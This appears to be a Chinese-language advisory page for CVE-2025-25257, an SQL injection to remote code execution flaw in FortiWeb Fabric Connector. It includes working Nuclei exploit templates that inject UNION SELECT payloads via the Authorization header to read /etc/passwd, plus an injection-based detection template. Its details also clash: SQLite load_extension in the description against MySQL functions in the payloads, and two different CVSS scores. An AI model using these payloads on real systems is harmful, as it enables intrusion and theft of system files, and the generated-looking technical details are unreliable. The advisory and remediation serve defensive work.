[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
CVE-2025-25257
FortiWeb Fabric Connector 7.6.x存在SQL注入漏洞,可导致未经身份验证的远程代码执行。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-25257 |
|---|---|
| 漏洞类型 | SQL注入导致远程代码执行 |
| 受影响版本 | FortiWeb Fabric Connector 7.6.0, 7.6.1 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-02-04 |
| 提交者 | Milad Karimi (Ex3ptionaL) |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
Fabric Connector在处理特定HTTP请求参数时未正确过滤用户输入,导致可构造SQL语句注入底层数据库,通过SQLite的扩展机制加载恶意共享库,最终实现远程代码执行。
🎯 攻击场景
1. 前置条件:目标系统运行FortiWeb Fabric Connector 7.6.0或7.6.1,且Fabric Connector服务端口可访问。 2. 攻击者向Fabric Connector发送特制的HTTP请求,其中包含恶意SQL注入payload。 3. payload利用SQLite的ATTACH DATABASE和load_extension函数,上传并加载恶意.so或.dll文件。 4. 恶意代码被执行,攻击者获得目标系统的远程shell或执行任意命令。 5. 成功标志:攻击者能通过反弹shell或命令执行结果确认控制权。
💥 漏洞影响
攻击者可完全控制受影响系统,实现远程代码执行、数据泄露、权限提升及后续横向移动,严重威胁系统安全。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-25257-exploit
info:
name: FortiWeb Fabric Connector SQL Injection to RCE
author: your-generated-template
severity: critical
description: Exploits CVE-2025-25257 to achieve pre-authentication SQL injection and potential Remote Code Execution on FortiWeb Fabric Connector
reference:
- https://www.exploit-db.com/exploits/52003
classification:
cvss-score: 9.1
cve-id: CVE-2025-25257
tags: fortinet,fortiweb,rce,sqli
variables:
cmd: "id"
http:
- raw:
- |
GET /api/fabric/device/status HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer aaa' UNION SELECT @@version,@@hostname,@@datadir,user(),database(),version(),@@basedir,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null -- -
Connection: close
- |
GET /api/fabric/device/status HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer aaa' UNION SELECT LOAD_FILE('/etc/passwd'),@@hostname,@@datadir,user(),database(),version(),@@basedir,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null -- -
Connection: close
- |
GET /api/fabric/device/status HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer aaa' UNION SELECT LOAD_FILE(CONCAT('/','etc','/passwd')),@@hostname,@@datadir,user(),database(),version(),@@basedir,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null -- -
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- 'root:.*:0:0:'
- 'uid=\d+\([a-z]+\)'
- 'gid=\d+\([a-z]+\)'
condition: or🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-25257-detection
info:
name: FortiWeb Fabric Connector SQL Injection Detection
author: your-generated-template
severity: high
description: Detects FortiWeb Fabric Connector version and potential SQL Injection vulnerability (CVE-2025-25257)
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-25257
classification:
cvss-score: 9.1
cve-id: CVE-2025-25257
tags: fortinet,fortiweb,rce,sqli,unauth
http:
- method: GET
path:
- '{{BaseURL}}/api/fabric/device/status'
headers:
Authorization: "Bearer aaa' OR '1'='1"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'deviceId'
- 'status'
- 'name'
condition: or
internal: true
- method: GET
path:
- '{{BaseURL}}/api/v2.0/system/info'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- 'FortiWeb-\d{3}[A-Z]?'
- 'FortiWeb\s+\d+\.\d+'
condition: or
internal: true
- method: GET
path:
- '{{BaseURL}}/login'
headers:
Authorization: "Bearer aaa' OR '1'='1"
matchers:
- type: word
words:
- 'FortiWeb'
- 'fortinet'
condition: or
internal: true🛡️ 修复建议
升级到FortiWeb Fabric Connector 7.6.2或更高版本。临时缓解措施包括:限制对Fabric Connector端口的网络访问,使用Web应用防火墙过滤SQL注入特征。
📎 参考链接
- https://www.fortiguard.com/psirt/FG-IR-25-001
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25257
- Exploit-DB 原文
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 06:23 | 来源: Exploit-DB